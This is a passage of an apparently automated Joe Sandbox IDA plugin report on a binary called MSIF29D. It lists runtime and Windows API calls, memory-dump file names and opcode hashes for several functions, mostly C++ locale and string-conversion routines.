                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92C2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB92EA
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB9422
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                                      • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                                                                      • Opcode ID: 8c65112b6a99c69b515e1e84a820e5f9c05c3234292e39603d4e8b29c6e35f21
                                                                                                                                                                                                                                                                      • Instruction ID: e2ed8b734c3cd1da172260572ddbc5382001cb4a5aafb53817de21a49fc43c4e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c65112b6a99c69b515e1e84a820e5f9c05c3234292e39603d4e8b29c6e35f21
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DB1607290010AABCF19EF68CD59FFE7BAAFF04310F18451AFA46A6351DA31D910EB51
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCBF85
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8657
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8679
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB86A1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB880E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                                      • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                                                                      • Opcode ID: 95fe4e4c952fbcef285cb152d5b64765af105ec3a0947c52b613c806a38631b5
                                                                                                                                                                                                                                                                      • Instruction ID: 5650a4cbfa6e0ba6abe19bcb4598de8ba8620093da50c865de635a35b6649710
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95fe4e4c952fbcef285cb152d5b64765af105ec3a0947c52b613c806a38631b5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0B1807294010BAFCF19DEA4CE56FFE3BA9EB05750F14411DFA0AA2251D631CA10EB91
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00FB3735
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB36D0: _wcschr.LIBVCRUNTIME ref: 00FB37C6
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00FB3CA8
                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00FB3D01
                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00FB3D7A
                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00FB3EB1
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FB3F34
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00FB3F7B
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                                                                                                                                      • String ID: NtQueryInformationProcess$1
                                                                                                                                                                                                                                                                      • API String ID: 566592816-516888619
                                                                                                                                                                                                                                                                      • Opcode ID: 2ee2b2e1484be734a164e9febf6d71f0641a6b25d5ddd6762b78b9e8dc55729d
                                                                                                                                                                                                                                                                      • Instruction ID: 5e0d99eff680ccbdbe2947ff96fc84ca2d019cd3e596f8a1d02d6c1f0d96ef5b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ee2b2e1484be734a164e9febf6d71f0641a6b25d5ddd6762b78b9e8dc55729d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8A14A70D04649DEDB20DF65CC48BEEBBF4BF48314F204599D449A7280EBB5AA88DF91
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FC855C
                                                                                                                                                                                                                                                                      • _Maklocstr.LIBCPMT ref: 00FC85C5
                                                                                                                                                                                                                                                                      • _Maklocstr.LIBCPMT ref: 00FC85D7
                                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 00FC85EF
                                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 00FC85FF
                                                                                                                                                                                                                                                                      • _Getvals.LIBCPMT ref: 00FC8621
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1CD4: _Maklocchr.LIBCPMT ref: 00FC1D03
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1CD4: _Maklocchr.LIBCPMT ref: 00FC1D19
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                                      • API String ID: 3549167292-2658103896
                                                                                                                                                                                                                                                                      • Opcode ID: fa1a893adb53e813f2c860df37aa8e1c478691c7d678ce98396c53cfaa667494
                                                                                                                                                                                                                                                                      • Instruction ID: e7abcff66ea015e47e5f39d761d07645d98a9c285bfc3858f77a38357360354d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa1a893adb53e813f2c860df37aa8e1c478691c7d678ce98396c53cfaa667494
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12219FB2D00308AAEF04EFA1CD86FDE7B68BF05750F04810AF904DF282DA749950DBA1
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::locale::_Init.LIBCPMT ref: 00FB9763
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC0C94: __EH_prolog3.LIBCMT ref: 00FC0C9B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC0C94: std::_Lockit::_Lockit.LIBCPMT ref: 00FC0CA6
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC0C94: std::locale::_Setgloballocale.LIBCPMT ref: 00FC0CC1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC0C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC0D17
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB978A
                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FB97F0
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00FB984A
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: __EH_prolog3.LIBCMT ref: 00FBF581
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FBF5C8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FBF620
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FBF654
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FBF6A8
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,?,010054B1,00000000), ref: 00FB99BF
                                                                                                                                                                                                                                                                      • __cftoe.LIBCMT ref: 00FB9B0B
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                                                                                                                      • API String ID: 3103716676-1405518554
                                                                                                                                                                                                                                                                      • Opcode ID: e568793273fe2b115ef9468e2715f1ca1a62ac32ae4aa3e58c3e6e8221dfcd81
                                                                                                                                                                                                                                                                      • Instruction ID: e87f02946d847228ce30d3aef8506d2d0a639b6ad8d4342df2f325920699464f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e568793273fe2b115ef9468e2715f1ca1a62ac32ae4aa3e58c3e6e8221dfcd81
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F1CD71E04248DFDF10CFA9C984BEEBBB5EF09314F244169E905AB381E7759A04DBA1
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,40000022,8F6E4A30,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00FB4154
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,8F6E4A30,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00FB4177
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FB4217
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,8F6E4A30,?,?,?), ref: 00FB42D2
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,8F6E4A30,?,?,?), ref: 00FB42F3
                                                                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,8F6E4A30,?,?,?), ref: 00FB4326
                                                                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,8F6E4A30,?,?,?), ref: 00FB4337
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4355
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4371
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1424318461-0
                                                                                                                                                                                                                                                                      • Opcode ID: af86cecc41d760f18f239ae808966a8eba2a2b99af31d4e3d3ef3e3b2e9ca38e
                                                                                                                                                                                                                                                                      • Instruction ID: e8f655016fc04fb5fc643b6ca66be69e47bf50c5ec17c560c4a5a1a94b27cf01
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af86cecc41d760f18f239ae808966a8eba2a2b99af31d4e3d3ef3e3b2e9ca38e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6818D71E002099FDB14DFA9D985BEEBBB5FF48320F244229E925E7281D730A901DF94
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00FD26F8
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FD2786
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FD27B0
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FD27F8
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FD2812
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FD2838
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FD2875
                                                                                                                                                                                                                                                                      • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00FD2892
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3603178046-0
                                                                                                                                                                                                                                                                      • Opcode ID: f13cdc44816c361276d6ca8ee79cbcd72065a9cf739d2425650f30ddf2d8b1c5
                                                                                                                                                                                                                                                                      • Instruction ID: 0df15144235aee6ca5f92efa9aaa9823af443d3ba4162dab17dd65fda6706a62
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f13cdc44816c361276d6ca8ee79cbcd72065a9cf739d2425650f30ddf2d8b1c5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B715F72D002499BDF619F64CC85AAE7BBBAF65760F2C015BE914A7350DB35C900F7A0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00FD21A3
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FD21CF
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00FD220E
                                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FD222B
                                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00FD226A
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FD2287
                                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FD22C9
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FD22EC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                      • Opcode ID: aaa572e7fe27f65fb9771f6312e7ca81c6ec92c0c0b7786375778c2f1d7b3d9f
                                                                                                                                                                                                                                                                      • Instruction ID: 346ae29280be15134857077fd0a23ce1e5c532fa045452879fe588748283af36
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa572e7fe27f65fb9771f6312e7ca81c6ec92c0c0b7786375778c2f1d7b3d9f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2251D13290020ABBEB205F64CC45FAF7BAAEF64751F19412AFA11E6250D7348D00FBA0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB8657
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB8679
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB86A1
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000044,00000000,8F6E4A30,?,00000000), ref: 00FB86F9
                                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 00FB877B
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FB87E4
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB880E
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2372200979-0
                                                                                                                                                                                                                                                                      • Opcode ID: 38921d44ed7d8ec583956419e4bc6543d5c1f6610f685fd32c4c602bef1e61df
                                                                                                                                                                                                                                                                      • Instruction ID: 084158e64dc4745271a7bed7f3fa5faad7621fd3a45c08ae53bf2ffaba0570f5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38921d44ed7d8ec583956419e4bc6543d5c1f6610f685fd32c4c602bef1e61df
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E461C071D00244CFDB21CF68C941BAAB7F4FF14314F24825DD845AB292EB35AE42DB91
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB92A0
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB92C2
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB92EA
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000018,00000000,8F6E4A30,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00FB9342
                                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 00FB93BD
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FB93F8
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB9422
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2372200979-0
                                                                                                                                                                                                                                                                      • Opcode ID: 67a179b17b594ef510d3bfbb8381889b7b93305cfd09b04c024b6f8fd35fcabf
                                                                                                                                                                                                                                                                      • Instruction ID: e170deb31e8edda84786772bb0457828e0424c8583cc101396c7beb02e1357b3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67a179b17b594ef510d3bfbb8381889b7b93305cfd09b04c024b6f8fd35fcabf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D51D070D08259DFCB21CFA8C540B9EBBF4FF04314F14815DD545AB281D7B9AA01EB90
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FD3F57
                                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD3F5F
                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FD3FE8
                                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD4013
                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FD4068
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                      • API String ID: 1170836740-1018135373
